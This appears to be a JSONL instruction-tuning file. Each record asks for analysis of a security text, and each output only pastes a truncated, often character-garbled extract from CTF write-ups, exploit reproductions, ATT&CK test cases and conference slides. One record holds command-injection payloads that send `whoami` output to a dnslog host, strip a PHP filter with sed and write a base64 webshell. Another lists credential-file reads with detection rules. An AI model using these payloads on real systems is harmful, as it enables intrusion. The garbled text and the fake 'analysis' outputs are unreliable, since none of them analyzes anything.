{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 WMCTF 2022 部分 WRITEUP 前 WEB subconverter RCE? 件写 任意件读取 构造quickjs脚本 RCE 链 RCE! 插曲 easyjeecg Java ssrf spark bash延时\"注\" 交互shell 6166lover 信息泄露 代码审计 cpython简单的沙箱逃逸 数据恢复? k8s 容器逃逸 PWN Ubuntu MISC Hacked_by_L1near permessage-deflate Checkin 2 作者:帽酱 这次WMCTF拿了3个 题设计常有趣 其中还有个0day 很多实际渗透遇到的问题也考虑到了 题给了个开源的代理订阅转换器 是个C++的项 拿到源码 先先寻找路由 查看鉴权逻辑 前 WEB subconverter 3 /* webServer.append_response(\"GET\", \"/\", \"text/plain\", [](RESPONSE_CALLBACK_ ARGS) -> std::string { return \"subconverter \" VERSION \" backend\\n\"; }); */ webServer.append_response(\"GET\", \"/version\", \"text/plain\", [](RESPONSE_CA LLBACK_ARGS) -> std::string { return \"subconverter \" VERSION \" backend\\n\"; }); webServer.append_response(\"GET\", \"/refreshrules\", \"text/plain\", [](RESPON SE_CALLBACK_ARGS) -> std::string { if(global.accessToken.size()) { std::string token = getUrlArg(request.argument, \"token\"); if(token != global.accessToken) { response.status_code = 403; return \"Forbidden\\n\"; } } refreshRulesets(global.customRulesets, global.rulesetsContent); return \"done\\n\"; }); webServer.append_response(\"GET\", \"/readconf\", \"text/plain\", [](RESPONSE_C ALLBACK_ARGS) -> std::string { if(global.accessToken.size()) { std::string token = getUrlArg(request.argument, \"token\"); if(token != global.accessToken) { response.status_code = 403; return \"Forbidden\\n\"; } } readConf(); if(!global.updateRulesetOnRequest) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 src/main.cpp C++ 复制代码 4 refreshRulesets(global.customRulesets, global.rulesetsContent ); return \"done\\n\"; }); webServer.append_response(\"POST\", \"/updateconf\", \"text/plain\", [](RESPONS E_CALLBACK_ARGS) -> std::string { if(global.accessToken.size()) { std::string token = getUrlArg(request.argument, \"token\"); if(token != global.accessToken) { response.status_code = 403; return \"Forbidden\\n\"; } } std::string type = getUrlArg(request.argument, \"type\"); if(type == \"form\") fileWrite(global.prefPath, getFormData(request.postdata", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMotorola Type II Trunking http://www.signalharbor.com/ttt/01apr/index.html 1 of 6 6/18/2007 14:11 This article first appeared in the April 2001 issue of Monitoring Times. MOTOROLA TYPE II TRUNKING With all of the various trunk-tracking scanners and software out there it is sometimes difficult to make sense of talkgroup numbers and understand why they occasionally change during a conversation. This month we'll take a look at Motorola Type II talkgroups and the different ways they can be displayed. We'll also report on a new radio system being built by Motorola for the state of Illinois. Type II Talkgroups Since your site seems to be becoming something of a collection point for tiny bits of the trunked jigsaw, if you are interested, the codes showing up on my 780 for Palm Springs Police Department in California are: 32784 - main channel 32816 - secondary 32912 - surveillance There are batches of other things ranging from the Airport to the dogcatcher but I haven't logged them down. The reason I note the above numbers is that they are distinctly different from those shown in the Uniden/Bearcat booklet which are in the format 200-13, 400-04, etc. Regards, David David, congratulations on your purchase of a Uniden 780XLT scanner. Although the manual for the scanner is pretty good, there is often confusion about the way a talkgroup may be displayed. The City of Palm Springs, California, is listed as having a Motorola hybrid system, which means it carries both Type I and Type II traffic. Apparently the Police Department uses Type II radios and the other city services use Type I. Five frequencies are licensed to the city, namely 857.4875, 858.4875, 858.9625, 859.4875 and 860.7125 MHz. Type I and Type II transmissions both use sixteen binary digits, or bits, to represent a talkgroup. These bits are sent out with every repeater transmission and are interpreted by your scanner. Motorola Type II Trunking http://www.signalharbor.com/ttt/01apr/index.html 2 of 6 6/18/2007 14:11 A T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n对 CVE-2022-39197 的曲折重现路 0x01 前言 之前看了@漂亮鼠大佬的文章最新 CS RCE 曲折的复现路对文章的内容非常感兴 趣但是大佬在文章中故意对关键利用链进行忽略如图 1.1 所示也勾起了大家浓烈的研 究兴趣 图 1.1 大佬隐藏的关键利用链 本来以为按照大佬的提示这会是比较简单的一次复现但是在实际过程中还是遇到很多 困难可能这就是大佬和小弟的区别吧非常感谢二哥@gainover 在复现过程中给予的指点 和帮助 在阅读本文之前需要首先阅读原文原文中很多内容已经很详细了我会尽量不写原文 已经有的内容算是完成大佬留下的课后作业吧 0x02 初探 第一次准备寻找相应的利用链的时候听到旁边的同事说除了 CS 受影响哥斯拉也受 到这个漏洞影响我下意识的以为这是一个通用的 JDK 的利用链所以最开始的很长一段时 间我都是直接在 JDK 中调试的完全忽略了 CobatStrike 本身虽然走了很多弯路但是还 是积累了一些基本的方法 在第一步复现的时候就遇到了问题跟着大佬的思路object 标签会自动调用对应的 setXXX 方法如图 2.1 所示但是我直接拷贝的大佬的代码但是我无论如何都进不去 setText 方法难道我连最基本的原理都理解错了 图 2.1 原文中对 setXXX 方法的简单利用 后来仔细调试之后才发现这里的单词写错了不是 parame而是 param然后看到了 这样的截图如图 2.2 所示大佬套路深我要回农村 图 2.2 大佬的套路 按照文章中给的思路要找到利用链需要满足四个条件 1classid 传入需要实例化的类类必须继承与 Component 2必须有无参构造方法貌似是因为 newinstant 是调用的无参构造方法 3必须存在一个 setXXX 方法的 XXX 属性 4setXXX 方法的传参数必须是接受一个 string 类型的参数 我们不可能人工来发现满足条件的类和方法可以直接通过 idea 发现所有继承自 Component 的类保存类名并通过反射的方式来筛选满足其他条件的所有的类和方法 从 JDK 中发现所有继承自 Component 接口的类如图 2.3 所示 图 2.3JDK 中继承自 Component 类的类 这些类只是满足了条件 1把所有继承自 Component 类的类道出保存成文件但是要 满足其他条件还需要继续对这些类进行筛选为了更方便的找出满足条件的类和方法我 写了一个自动化遍历的代码其主要功能是读取刚才保存的继承自 Component 类信息的文 件然后通过反射的方式来判断类是否满足其他几个条件如图 2.4 所示其中 classFullName 代表需要便利的完整的类名主要是通过正则的方式从文件中读取限于篇幅有限就不展 示了过程中主要的步骤我都以注释的方式解释代码 图 2.4 自动化便利筛选满足条件的类 按照这种方式我们很容易就找到了很多满足条件的类如图 2.5 所示总计大概有 160 个 图 2.5 在 JDK 中筛选的满足条件的类及对应的方法 但是按照这种方式筛选的满足条件的方法最终的数据量还是很大筛选到的方法中有大 量无用的方法比如 setNamesetLabelsetToolTipTextsetAsText 等这些方法都很简单 一般只是对应 swing 最终界面展示内容的功能我们先暂时不考虑这些功能所以我们对上 面的代码进行了改进增加黑名单方法如图 2.6 所示 图 2.6 增加黑名单方法 按照这种方式筛选之后 JDK 中可能满足的方法就只剩下 19 个如图 2.7 所示 图 2.7 筛选之后 JDK 中可疑的 19 个方法 这些方法都需要进行人工研判其中最能吸引人眼球的是 setDocumentBase 方法这 种方法名总是给人一种像是 JNDI 注入设置路径的感觉但是实际测试来看根本就不会调用 这个方法因为 documentBase 属性不是 writeMethod而仅仅是一个 readMethod在 ObjectView 类中也明确要求满足条件的属性必须是 writeable而这应该也算是第 5 个条 件吧如图 2.8 所示 图 2.8 判断属性是否是属于 Writeable property 又对其他的方法依次都进行了查看总归是没有找到哪一个方法能导致命令执行 0x03 峰转 在我还在对着 JDK 的源码死磕的时候看到朋友圈里面二哥发了一张利用 object 标签 执行命令的图然后问了一下二哥是不是 setContentType因为站在我当时的角度只 有 setContentType 里面有较复杂的逻辑设计到了动态类加载的过程但是二哥回复说不 是不要看 JDK 的可以看看 CS 的类 这时候我才突然醒悟过来这个漏洞虽然说影响了 CobaltStrik", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# InsoBot (misc,network) note: this writeup was written long after the actual CTF - the platform was available only on the local on-site network, so some stuff might be a bit vague ### recon in the description we don't get any files or links, only the info that someone's scanning the network. after launching wireshark, we found a *ton* of ARP queries for the local network, so after filtering those out, we were left with a handful of packets. some of them were from the cisco switch we had on our desk, others from the fortinet hardware handling the network, but after a while we noticed some incoming TCP packets: ![listing of packets, showing multiple TCP SYN to ports 9990, 9991 and 9992, with corresponding RSTs from us](insobot-wireshark.png) we ran a simple HTTP server, and to our surprise, started getting valid HTTP requests: ```console $ python3 -m http.server 9991 Serving HTTP on 0.0.0.0 port 9991 (http://0.0.0.0:9991/) ... 127.0.0.1 - - [03/Apr/2023 18:39:00] code 400, message Bad request version ('À\\\\x13À') 127.0.0.1 - - [03/Apr/2023 18:39:00] \"\\x16\\x03\\x01\\x00î\\x01\\x00\\x00ê\\x03\\x03#ÐO#\\x04B\\x9dä\\x8c\"Ó0\\x0f3À\\x10H\\x0cEgkqeSÓìÂÙ! \\x94Ju>\\x98\\x82\\x1bÉ)OÍÛ\\x88\\x85¹B\\x0b\\x89\\x9dß\\x1f0\\x1fc\\x96TÎKë\\x00&À+À/À,À0ÌÌÀ\\x09À\\x13À\" 400 - 127.0.0.1 - - [03/Apr/2023 18:39:00] \"GET / HTTP/1.1\" 200 - ``` ![http request in wireshark, showing a header X-tool pointing to github.com/GigaTakos/Reconator](insobot-wireshark-http.png) ### reading weird shell code following to https://github.com/GigaTakos/Reconator, we find two shell scripts: `main.sh`, which is less interesting: ```sh # HACK THE WORLD mapcidr -cidr 0.0.0.0/8 -o targets.txt # <snip> while true; do cat targets.txt | parallel -j90 sudo docker run --rm reconator bash /opt/reconator.sh {} done ``` and `reconator.sh`, that does all the heavy lifting: ```sh # BUG BOUNTY RECON AWESOME ONLINER PIPELINE cat <<EOF > services.txt tcp:9990 tcp:9991 tcp:9992 EOF echo \"$1\" echo \"$1\" | /root/go/bin/httpx -nfs -H \"X-tool: github.com/Gi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFuzzing on train: AI制导PDF文件生成技术的探索之旅 邹权臣 中国信息安全测评中心博士后 马金鑫 中国信息安全测评中心副研究员 个人简介 马金鑫 中国信息安全测评中心 副研究员 北京邮电大学硕士生导师 研究方向软件安全漏洞分析 主持多项国家省部级科研项目发表20余篇学术论文获 得软件著作权5项发明专利2项曾发现多个0Day漏洞 邹权臣 中国信息安全测评中心 博士后 研究方向自动化漏洞分析 负责参与多项国家省部级科研项目发表 多篇学术论文 majinxin2003@126.com zouquanchen@126.com 目录 研究背景 方案设计 实验分析 结论与展望 研究背景 高结构化样本与PDF文件 AI&样本生成 LEARN&FUZZ 高结构化样本与PDF文件 高结构化样本结构复杂通过规定的语法语义检查才能被各类解析工具执行 语法检查 语义检查 语法规则 语义规则 PDFXMLXSL JavaScriptHTML等 测试输入 解析执行 Foxit ReaderAdobe Reader ChromeEdgeFirefox等 不通过 通过 通过 不通过 结束 结束 完成 高结构化样本与PDF文件 xref 0 257 0000000000 65535 f 0000000017 00000 n 0000000212 00000 n 0000000231 00000 n 0000000251 00000 n 0000000825 00000 n 0000000876 00000 n trailer <</Info 19 0 R /Root 21 0 R /Size 257/ID[<15481298DAABCC5184A2001C560B476B><6DC090EE200F6EB 5201096388FFC0D37>]>> startxref 320283 %%EOF %PDF-1.3 8 0 obj << /Type /Pages /Kids[ 22 0 R ] /Count 1 >> endobj Header Body Cross- reference table Trailer PDF文件所遵从的 版本号 间接对象地址索引表 由一系列的PDF间接对象组成如字体页面图像等构成了PDF 文件的具体内容按大类可分为带stream不带stream的obj 指明根对象(Catalog)保存了加密等安全信息 并声明交叉引用表的地址 Adobe Systems Incorporated. PDF Reference, 6th edition, Nov.2006. http://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf reference 1-7.pdf 1310页 209 0 obj << /Type /XObject /Subtype /Image /Width 51 /Height 69 /BitsPerCom ponent 8 /ColorSpace 29 0 R /Length 214 /Filter [ /ASCII85Decode /FlateDecode ] >> Stream  endstream endobj AI&样本生成 AI制导 基于变异的模糊测试 AFLVUzzer等 基于生成的模糊测试 PeachSpike Jsfunfuzz等 样本合法性弱 人工参与度高 自动化 程度高 合法性 强 具有多 样性 AI&样本生成 arXiv 18 S&P 17 arXiv 17 arXiv 18 arXiv 17 ASE 17 Q-Learning GAN PCSG LSTM LSTM/BLSTM/seq2seq CNN LEARN&FUZZ  数据集来源Windows fuzzing team  初始测试集63,000 non-binary PDF objects out of 534 PDF files (seed minimization)  实验数据集1,000 PDF objects  模型LSTM with 2 hidden layers  实验环境4-core 64-bit Windows 10 VMs with 20GB of RAM  训练时长50 epoch 10 hours  生成PDF数量1,000 per 10 epoch  测试结果EdgePass rate(70%-97%) Instruction coverageBugs(1) 方案设计 研究方案 数据集构建 模型训练 生成 研究方案 Pdf dataset Build model Model Pdf objs Extract obj/stream Ne", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1518-win-发现安全软件 ## 来自ATT&CK的描述 攻击者可能会试图获取安装在系统或云环境中的软件和软件版本的清单攻击者可能会在自动发现过程中使用来自[软件发现](https://attack.mitre.org/techniques/T1518)的信息来制定后续行为包括攻击者是否完全获得目标权限或尝试特定攻击手法 攻击者可能出于各种原因试图列举软件例如弄清有哪些安全措施或者被攻击的系统是否有容易被利用来进行特权升级的软件版本 ## 测试案例 ### 测试1 Find and Display Internet Explorer Browser Version 查询注册表以确定系统上安装的Internet explorer的版本执行后将显示关于Internet explorer的版本信息 测试命令使用Windows命令行CMD ``` reg query \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\" /v svcVersion ``` ### 测试2 Applications Installed 查询注册表以确定系统上安装的软件和版本执行时将显示一个软件名称和版本信息表 测试命令使用Windows powershell ``` Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize ``` ### 测试3 Find and Display Safari Browser Version 查找和显示Safari浏览器版本 攻击者可能试图获得安装在系统上的非安全相关软件的清单在自动发现过程中攻击者可能会使用来自软件发现的信息来确定后续的行为 测试命令使用MAC_sh执行 ``` /usr/libexec/PlistBuddy -c \"print :CFBundleShortVersionString\" /Applications/Safari.app/Contents/Info.plist /usr/libexec/PlistBuddy -c \"print :CFBundleVersion\" /Applications/Safari.app/Contents/Info.plist ``` ## 检测日志 windows sysmon日志 Mac0S_history ## 测试复现 ### 测试1 Find and Display Internet Explorer Browser Version ``` C:\\Users\\Administrator.ZHULI>reg query \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\" /v svcVersion HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer svcVersion REG_SZ 11.973.17763.0 ``` ### 测试2 Applications Installed ``` PS C:\\Users\\Administrator.ZHULI> Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize DisplayName DisplayVersion Publisher InstallDate ----------- -------------- --------- ----------- Parallels Tools 17.1.1.51537 Parallels International GmbH 20220107 UniversalF", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH TEE 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 tee \\- 从标准输入读入并写往标准输出和文件 .SH 概述 \\fBtee\\fP [\\fI\\,选项\\/\\fP]... [\\fI\\,文件列表\\/\\fP]... .SH 描述 .\\\" Add any additional description here .PP 把标准输入的数据复制到文件列表中的每一个文件同时送往标准输出 .TP \\fB\\-a\\fP, \\fB\\-\\-append\\fP 追加到给出的文件而不是覆盖 .TP \\fB\\-i\\fP, \\fB\\-\\-ignore\\-interrupts\\fP 忽略中断信号 .TP \\fB\\-p\\fP 对写入非管道的行为排查错误 .TP \\fB\\-\\-output\\-error\\fP[=\\fI\\,模式\\/\\fP] 设置写入出错时的行为见下面模式部分 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .SS 模式确定向输出写入出错时的行为 .TP warn 对向任何文件输出出错的情况进行诊断 .TP warn\\-nopipe 对向除了管道以外的任何文件输出出错的情况进行诊断 .TP exit 一旦输出出错则退出程序 .TP exit\\-nopipe 一旦输出出错且非管道则退出程序 .PP \\fB\\-p\\fP 选项的默认模式是warn\\-nopipe当 \\fB\\-\\-output\\-error\\fP 没有给出时默认的操作是在向管道写入出错时立刻退出且在向非管道写入出错时对问题进行诊断 .SH 作者 由 Mike Parker, Richard M. Stallman 和 David MacKenzie 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br 本软件是自由软件您可以自由修改和重新发布它在法律允许的范围内不提供任何保证 .SH 参见 完整文档请见 <https://www.gnu.org/software/coreutils/tee> .br 或者在本地使用 info \\(aq(coreutils) tee invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKartograph Elie Bursztein and Jocelyn Lagarenne Stanford University 1 Jocelyn Lagarenne & Elie Bursztein Kartograph (cd version) http://ly.tl/t10 Welcome to the real world Jocelyn Lagarenne & Elie Bursztein Kartograph (cd version) http://ly.tl/t10 supernatural powers !  Learn kungfu  Infinite money  Xray vision  god mode Jocelyn Lagarenne & Elie Bursztein Kartograph (cd version) http://ly.tl/t10 God mode illustrated (video) Jocelyn Lagarenne & Elie Bursztein Kartograph (cd version) http://ly.tl/t10 Memory based attack Memory Jocelyn Lagarenne & Elie Bursztein Kartograph (cd version) http://ly.tl/t10 Memory based attack Memory Modification Jocelyn Lagarenne & Elie Bursztein Kartograph (cd version) http://ly.tl/t10 Memory based attack Memory Modification Jocelyn Lagarenne & Elie Bursztein Kartograph (cd version) http://ly.tl/t10 Benefits (fast and furious)  Generic  Fast  Invisible  Generic  Fast  Invisible Jocelyn Lagarenne & Elie Bursztein Kartograph (cd version) http://ly.tl/t10  Structure are hard to find  No control over the flow Drawbacks Game memory Structures Jocelyn Lagarenne & Elie Bursztein Kartograph (cd version) http://ly.tl/t10 Background Jocelyn Lagarenne & Elie Bursztein Kartograph (cd version) http://ly.tl/t10 Game industry 273 Millions games sold in 2009 Jocelyn Lagarenne & Elie Bursztein Kartograph (cd version) http://ly.tl/t10 Game type Action Jocelyn Lagarenne & Elie Bursztein Kartograph (cd version) http://ly.tl/t10 Game type Action First person Jocelyn Lagarenne & Elie Bursztein Kartograph (cd version) http://ly.tl/t10 Game type Action First person Sport Jocelyn Lagarenne & Elie Bursztein Kartograph (cd version) http://ly.tl/t10 Game type Action First person Sport Role playing Jocelyn Lagarenne & Elie Bursztein Kartograph (cd version) http://ly.tl/t10 Game type Action First person Sport Role playing Adventure Jocelyn Lagarenne & Elie Bursztein Kartograph (cd version) http://ly.tl/t10 Game type Action First person Sport Role playing Adventure Strategy ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHooked Browser Meshed-Networks with WebRTC and BeEF The sad tale of vegetarian browsers Trigger warning: presentation includes JavaScript $ whoami  Christian Frichot  @xntrik  Co-Author of The Browser Hackers Handbook  @beefproject developer DEFCON 23 @xntrik Vegie Browsers DEFCON 23 @xntrik Vegie Browsers $ ./display_overview.sh DEFCON 23 @xntrik Vegie Browsers JS, client-side testing & BeEF Mooo DEFCON 23 @xntrik Vegie Browsers Problems with browser communication channels DEFCON 23 @xntrik Vegie Browsers How WebRTC can help Plus: wth is WebRTC? DEFCON 23 @xntrik Vegie Browsers Integration WebRTC into BeEF Plus Demo! DEFCON 23 @xntrik Vegie Browsers $ ./lets_go Unfortunately BeEF is written in Ruby and not #golang DEFCON 23 @xntrik Vegie Browsers Client-side security testing DEFCON 23 @xntrik Vegie Browsers Browsers explosive growth DEFCON 23 @xntrik Vegie Browsers Attack surface growth DEFCON 23 @xntrik Vegie Browsers Demise of thick-ish based browser tech DEFCON 23 @xntrik Vegie Browsers $ killall flash Who hasnt done this yet?? DEFCON 23 @xntrik Vegie Browsers $ brew install web2.0 DEFCON 23 @xntrik Vegie Browsers DEFCON 23 @xntrik Vegie Browsers WTF is browser hacking? $ ./initiate_pimp_mode.sh DEFCON 23 @xntrik Vegie Browsers @antisnatchor (hates pants) @wadealcorn (likes pants) DEFCON 23 @xntrik Vegie Browsers Initiating Control Retaining Control Bypassing SOP Attacking Users Attacking Extensions Attacking Users Attacking Browsers Attacking Plugins Attacking Networks Attacks DEFCON 23 @xntrik Vegie Browsers Initiating Control Bypassing SOP Attacking Users Attacking Extensions Attacking Users Attacking Browsers Attacking Plugins Attacking Networks Attacks Retaining Control DEFCON 23 @xntrik Vegie Browsers $ ./beef DEFCON 23 @xntrik Vegie Browsers $ cat beef | grep comm  XMLHttpRequest  WebSockets  DNS DEFCON 23 @xntrik Vegie Browsers $ vim core/main/client/net.js $ vim core/main/client/websocket.js $ vim core/main/client/net/dns.js DEFCON 23 @xntrik Vegie Brows", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 哈希函数 哈希函数Hash Function把消息或数据压缩成摘要使得数据量变小其一般模型如下 显然对于任何一个hash值理论上存在若干个消息与之对应即碰撞 哈希函数的基本需求如下 | 需求 | 描述 | | ------ | ---------------------------------------- | | 输入长度可变 | hash函数可以应用于任意长度的数据 | | 输出长度固定 | hash函数的输出长度固定 | | 效率 | 对于任意消息 $x$计算 $H(x)$ 很容易 | | 单向性 | 对于任意哈希值h想要找到满足$H(x)=h$ 的x在计算上不可行 | | 抗弱碰撞性 | 对于任意消息x找到满足另一消息y满足$H(x)=H(y)$ 在计算上不可行 | | 抗强碰撞性 | 找到任意一对满足 $H(x)=H(y)$ 的消息x和y在计算上不可行 | | 伪随机性 | 哈希函数的输出满足伪随机性测试标准 | 散列值的目的如下 - 确保消息的完整性即确保收到的数据确实和发送时的一样即没有修改插入删除或重放防止中间人篡改 - 冗余校验 - 单向口令文件比如linux系统的密码 - 入侵检测和病毒检测中的特征码检测 目前的Hash函数主要有MD5SHA1SHA256SHA512目前的大多数hash函数都是迭代性的即使用同一个hash函数不同的参数进行多次迭代运算 | 算法类型 | 输出 Hash 值长度 | | ------ | ----------------- | | MD5 | 128 bit | | SHA1 | 160 bit | | SHA256 | 256 bit | | SHA512 | 512 bit |", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n前 今天遇到个有意思的Linux命令执绕过分享下 某络设备后台有个Ping功能命令执回显使 dnslog收到请求因此icmpdns出 但是进步命令执的时候发现存在很多替换为空的过滤 第步绕过cp命令读取源码 ping.php中存在参数过滤函数并且使 exec() 命令执因此回显 根据include包含的件必然能找到过滤函数所在的件 过滤如下 `whoami`.dnslog cp ping.php ping.txt cd ..\\ncd ..\\ncd ..\\ncd ..\\ncd model\\ncp filter.php filter.txt $val = str_replace(\"<\", \"\", $val); $val = str_replace(\">\", \"\", $val); $val = str_replace(\"/\", \"\", $val); $val = str_replace(\"+\", \"\", $val); $val = str_replace(\"'\", \"\", $val); $val = str_replace(\"\\\"\", \"\", $val); $val = str_replace(\";\", \"\", $val); $val = str_replace(\"?\", \"\", $val); $val = str_replace(\"%\", \"\", $val); $val = str_replace(\")\", \"\", $val); $val = str_replace(\"(\", \"\", $val); $val = str_replace(\":\", \"\", $val); $val = str_replace(\"&\", \"\", $val); $val = str_replace(\"|\", \"\", $val); 第步绕过sed删除过滤 which 存在wget尝试wget发现tcp不出 后来想到sed可以增加删除替换但是增加和替换php代码都需要到标点于是去删除过 滤函数中的过滤代码注意事先cp备份 最后写个shell 先写个句话phpinfo发现是php5.2的shell连接具的加密别选aes或者直接上个  其他思路 当时另个思路就是后台还有志功能可以考虑写shell到志件再cp到web录 因为sed成了就没去试 想听听家有什么其他的可思路 抱拳了.jpg cd ..\\ncd ..\\ncd ..\\ncd ..\\ncd model\\nsed -i 4d filter.php cmd=file_put_contents('2.php', base64_decode('xxxxxxxx');", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1087-001-linux-本地账户发现 ## 来自ATT&CK的描述 攻击者可能会尝试获取本地系统帐户的列表此信息可以帮助攻击者确定系统上存在哪些本地帐户以帮助后续行为 在Linux上可以通过使用/etc/passwd的文件来枚举本地用户在mac中除文件外此相同文件仅用于单用户模式/etc/master.passwd此外可以通过groups和id命令枚举组 ## 测试案例 枚举所有账户`cat /etc/passwd` 查看sudoers文件`cat /etc/sudoers` 查看UID为0的帐户`username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username` 显示用户帐户是否有远程记录器`lastlog` 枚举用户和组groups 或者 id ## 检测日志 bash历史记录 ## 测试复现 枚举所有账户`cat /etc/passwd` 查看sudoers文件`cat /etc/sudoers 需要root权限` 查看UID为0的帐户`username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username ` 显示用户帐户是否有远程记录器`lastlog` 枚举用户和组groups需要root权限 或者 id ## 测试留痕 ```bash root@icbc:~/Desktop$ history 385 cat /etc/passwd 386 cat /etc/sudoers 387 username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username 388 lastlog 389 groups 390 id 391 history ``` ## 检测规则/思路 ### splunk规则 index=linux sourcetype=bash_history cat /etc/passwd | table host,user_name,bash_command index=linux sourcetype=bash_history cat /etc/sudoers | table host,user_name,bash_command index=linux sourcetype=bash_history \"lsof -u *\" | table host,user_name,bash_command index=linux sourcetype=bash_history lastlog | table host,user_name,bash_command index=linux sourcetype=bash_history group OR id | table host,user_name,bash_command ### 建议 值得注意的是应该结合上下文中查看研判而不是单独依靠关键词检测因为系统管理员经常使用这些命令进行合法操作 ## 参考推荐 MITRE-ATT&CK-T1087-001 <https://attack.mitre.org/techniques/T1087/001> linux UID详解 <https://blog.csdn.net/jthivan/article/details/50530955> linux ID查看命令详解 <https://blog.csdn.net/qq_21808961/article/details/78532487>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@unapibageek - @ssantosv Tracking Malware Developers by Android AAPT Timezone Disclosure Bug ROCK APPROUND THE CLOCK! @unapibageek - @ssantosv Sheila Ayelen Berta Sergio De Los Santos Security Researcher ElevenPaths (Telefonica Digital cyber security unit) Head of Innovation and Lab ElevenPaths (Telefonica Digital cyber security unit) @unapibageek - @ssantosv @unapibageek - @ssantosv @unapibageek - @ssantosv @unapibageek - @ssantosv WHAT WE DID? @unapibageek - @ssantosv WHAT WE DID? @unapibageek - @ssantosv WHAT WE DID? @unapibageek - @ssantosv WHAT WE DID? @unapibageek - @ssantosv @unapibageek - @ssantosv WHAT IS AAPT? @unapibageek - @ssantosv WHAT IS AAPT? @unapibageek - @ssantosv Aapt timezone disclosure @unapibageek - @ssantosv Aapt timezone disclosure @unapibageek - @ssantosv Aapt timezone disclosure @unapibageek - @ssantosv Aapt timezone disclosure @unapibageek - @ssantosv ANALYZING SOURCE CODE @unapibageek - @ssantosv ANALYZING SOURCE CODE @unapibageek - @ssantosv ANALYZING SOURCE CODE @unapibageek - @ssantosv ANALYZING SOURCE CODE @unapibageek - @ssantosv ANALYZING SOURCE CODE @unapibageek - @ssantosv ANALYZING SOURCE CODE @unapibageek - @ssantosv ANALYZING SOURCE CODE @unapibageek - @ssantosv ANALYZING SOURCE CODE @unapibageek - @ssantosv ANALYZING SOURCE CODE EVEN = 0 @unapibageek - @ssantosv ANALYZING SOURCE CODE @unapibageek - @ssantosv ANALYZING SOURCE CODE @unapibageek - @ssantosv THE PROBLEM BUG = LOCALTIME(0) @unapibageek - @ssantosv THE PROBLEM BUG = LOCALTIME(0) EXPECTED = LOCALTIME(TIMESTAMP) @unapibageek - @ssantosv runtime analysis @unapibageek - @ssantosv runtime analysis @unapibageek - @ssantosv runtime analysis @unapibageek - @ssantosv runtime analysis @unapibageek - @ssantosv runtime analysis @unapibageek - @ssantosv WHY A TIMEZONE? HOUR = UNIX EPOCH +/- TIMEZONE Localtime(): @unapibageek - @ssantosv WHY A TIMEZONE? HOUR = UNIX EPOCH +/- TIMEZONE E.g: GMT +3 = UNIX EPOCH + 3Hs GMT -3 = UNIX EPOCH - 3Hs Localtime(): @unapibageek - @ssantosv W", "category": "text_analysis", "source": "security_papers"}
